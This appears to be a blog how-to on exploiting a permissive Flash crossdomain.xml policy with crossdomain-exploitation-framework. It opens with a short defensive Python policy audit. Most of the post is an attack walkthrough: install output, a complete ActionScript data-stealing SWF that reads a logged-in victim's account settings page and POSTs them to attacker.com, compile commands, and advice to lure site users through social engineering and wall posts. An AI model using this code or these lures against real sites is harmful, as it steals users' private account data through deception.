
It is a story from the past, but I decided to write a short how-to on exploiting it with crossdomain-exploitation-framework.

One time I found a permissive crossdomain.xml file.

If the site contains sensitive information, for example people are logged into their accounts, which hold sensitive data, we can steal this information, of course with social engineering or by posting something on our wall and asking other people to review the post.

That was the main idea of how to attack end users; now a short technical how-to.
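What "permissive" means in practice is worth checking mechanically before reaching for the framework. The following audit is an added example, not code from this post or from crossdomain-exploitation-framework; the two sample policies are constructed, and it reports each grant that lets a SWF on another origin read responses carrying the user's cookies.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the kind of permissive policy that makes the attack possible.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

# Constructed sample: the same site restricted to its own hosts over HTTPS.
STRICT_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.victim.com" secure="true"/>
  <allow-access-from domain="static.victim.com" secure="true"/>
</cross-domain-policy>"""


def audit_crossdomain(xml_text):
    """Return findings explaining why the policy is permissive; empty means no wildcard grants."""
    root = ET.fromstring(xml_text)
    findings = []
    for node in root.findall("allow-access-from"):
        domain = node.get("domain", "")
        if domain == "*":
            findings.append('allow-access-from domain="*": a SWF on any origin may read '
                            'authenticated responses from this host')
        elif domain.startswith("*."):
            findings.append(f'allow-access-from domain="{domain}": every subdomain is '
                            'trusted, including any that serves user-uploaded content')
        # secure="false" on an HTTPS site lets SWFs loaded over plain HTTP read its responses
        if node.get("secure", "true").lower() == "false":
            findings.append(f'allow-access-from domain="{domain}" secure="false": SWFs '
                            'loaded over plain HTTP may read this HTTPS host')
    for node in root.findall("allow-http-request-headers-from"):
        if node.get("domain") == "*":
            findings.append('allow-http-request-headers-from domain="*": any origin may '
                            'send custom request headers')
    sc = root.find("site-control")
    if sc is not None and sc.get("permitted-cross-domain-policies") == "all":
        findings.append('site-control permitted-cross-domain-policies="all": policy files '
                        'anywhere on the host (e.g. upload directories) are honoured too')
    return findings
```

Run `audit_crossdomain(PERMISSIVE_POLICY)` to see the three findings and `audit_crossdomain(STRICT_POLICY)` to get an empty list; the strict policy is the shape a site owner should ship instead.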

 

These steps are written below with some comments:

1) Download

git clone https://github.com/sethsec/crossdomain-exploitation-framework.git

2) Run it to check the installation and dependencies

./SWF-server

**************************************************
*                                                *
*              Welcome to SWF Server!            *
*                                                *
**************************************************

It looks like this is the first run.  We need to set up a few things first.

[INSTALL] Creating /opt/flex...
[INSTALL] Downloading Flex (This is a 340MB file)...
[INSTALL] Downloading: http://download.macromedia.com/pub/flex/sdk/flex_sdk_4.6.zip Bytes: 343973963
[INSTALL] Extracting Flex to /opt/flex (Takes 5-20 seconds)
[INSTALL] Creating a self-signed SSL cert...
[INSTALL] Key and Cert saved in /opt/crossdomain-exploitation-framework/server.pem
[INSTALL] Copying http-crossdomain.nse to nmap scripts directory...
cp: cannot create regular file '/usr/share/nmap/scripts/http-crossdomain.nse': Permission denied
[INSTALL] Installation complete. Compile SWF and then start SWF-server again

     To create your own SWF file:

     1) Chose a template from ./actionscript-templates
     2) Edit the template (or copy and then edit the template)
         a) Specify a page on the vulnerable site that you want your victimn to access:
              Ex: http://vulnerable.com/account/settings
         b) For data stealing SWFs, specify your attacker callback URL:
              Ex: http://attacker/, https://192.168.0.100, or https://www.attacker.com/
         c) For CSRF SWFs, modify the actionscript to extract the information you need
     3) Compile the ActionScript file and drop the SWF to the ./webroot directory (exploit.swf)
         a) /opt/flex/bin/mxmlc ./actionscript-templates/<template>.as --output ./webroot/exploit.swf

     4) Re-run ./SWF-server

3) Let's use a link from our account settings and put it in StealData.as, together with the link to our attacker-controlled site.

// Author: Gursev Singh Kalra
// Very slightly modified by Seth Art
// StealData.as

package {
        import flash.display.Sprite;
        import flash.events.*;
        import flash.net.URLRequestMethod;
        import flash.net.URLRequest;
        import flash.net.URLLoader;

        public class StealData extends Sprite {
                public function StealData() {
                        // Target URL from where the data is to be retrieved
                        var readFrom:String = "http://victim.com/account/menu.php?action=settings";
                        var readRequest:URLRequest = new URLRequest(readFrom);
                        var getLoader:URLLoader = new URLLoader();
                        getLoader.addEventListener(Event.COMPLETE, eventHandler);
                        try {
                                getLoader.load(readRequest);
                        } catch (error:Error) {
                                trace("Error loading URL: " + error);
                        }
                }

                private function eventHandler(event:Event):void {
                        // URL to which retrieved data is to be sent
                        var sendTo:String = "http://attacker.com/new_article.php";
                        var sendRequest:URLRequest = new URLRequest(sendTo);
                        sendRequest.method = URLRequestMethod.POST;
                        var body:String = escape(event.target.data);
                        sendRequest.data = body;
                        var sendLoader:URLLoader = new URLLoader();
                        try {
                                sendLoader.load(sendRequest);
                        } catch (error:Error) {
                                trace("Error loading URL: " + error);
                        }
                }
        }
}

4) Let's compile it

/opt/flex/bin/mxmlc ./actionscript-templates/StealData.as --output ./poc.swf
Loading configuration file /opt/flex/frameworks/flex-config.xml
/opt/crossdomain-exploitation-framework/actionscript-templates/StealData.as: Warning: This compilation unit did not have a factoryClass specified in Frame metadata to load the configured runtime shared libraries option.

/opt/crossdomain-exploitation-framework/poc.swf (1100 bytes)

5) Now put poc.swf on your web server and insert a call to poc.swf in your page's code

6) Use your imagination and provide the link to other users of the victim.com site: use the wall, social engineering, or send private messages with text like "I kindly ask you to read my short article about whatever".

7) Wait... Enable full web server logging or use tcpdump; that is also up to you.

 

That's all, cheers
